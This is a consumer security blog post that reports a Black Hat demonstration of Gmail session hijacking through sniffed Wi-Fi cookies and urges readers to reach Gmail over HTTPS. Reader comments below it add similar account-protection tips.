Protect Your Gmail Account From Hackers

At the recent Black Hat security convention, Robert Graham, the CEO of errata security demonstrated on camera how he hijacked a Gmail session and read the victim’s emails. He sniffed the Wi-Fi network for cookies and copied them into his notebook using his self-made tool, Hamster. The hack doesn’t need the victim’s username or password to work. It only requires an IP address.

This hack has been reported to work on almost any cookie-based web application. Therefore, other web-based email services Yahoo Mail and Hotmail is vulnerable as well.

The good news is that this hack can be easily prevented with the use of SSL or any other types of encryption. However, it is reported that Internet users seldom use these form of security measures when accessing the emails thus putting them at risk.

For example, accessing Gmail from http://mail.google.com will lead you to an SSL page where you insert your username and password. However, you will then be redirected to a non-SSL page to access your emails which puts you in a vulnerable situation.

Accessing Gmail without using SSL

On the other hand, accessing Gmail from https://mail.google.com (doesn’t work for me that’s why I’m using https://mail.google.com/mail?tab=wm instead) forces Gmail to redirect you to an SSL page after login.

Accessing Gmail using SSL

There are some photos of the hacking demonstration available. Remember to always use an SSL page (https) whenever there is such an option. Protect yourself online.


7 thoughts on “Protect Your Gmail Account From Hackers

  1. mooiness says:

    I tried your method which is to hit the HTTPS version of the main page but it still goes back to non-HTTPS after I’ve logged in. I tried out the extension that Azmeen recommended and it works a treat. :)

  2. TenthOfMarch says:

    @Azmeen
    Thanks for the info, Azmeen! :-) .

    @mooiness
    Hmmm…that is strange. I tried it on FF and IE. They both worked for me (as shown in the screenshot above).

    @Hasbullah Pit
    Saya rasa dia guna http masa dia digodam. Jika guna https, kemungkinan dia digodam adalah sangat tipis.

  3. rrr says:

    Dear Sir
    Regularly some one open my gmail account how to protect my account and how can i find who is the culprit

  4. TenthOfMarch says:

    @rrr
    Wow, this is beyond my knowledge. You should first change your password to something more complex. Mix letters and numbers in it. And change all your “security questions”. Login to Gmail using https://mail.google.com. That’s all I can help. I have no idea how you can detect the person entering your account though. All the best.

  5. Vaibhav Kanwal says:

    Hi! I think most of the hacking being done is not the actual hacking but infact Social Engineering or Phishing. People fall prey and end up loosing their username/passwords. This can not be termed as hacking. The only way is to educate people to be able to guard themselves against Social Engineering but when people are still using IE6, its a bit difficult to get this going.

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>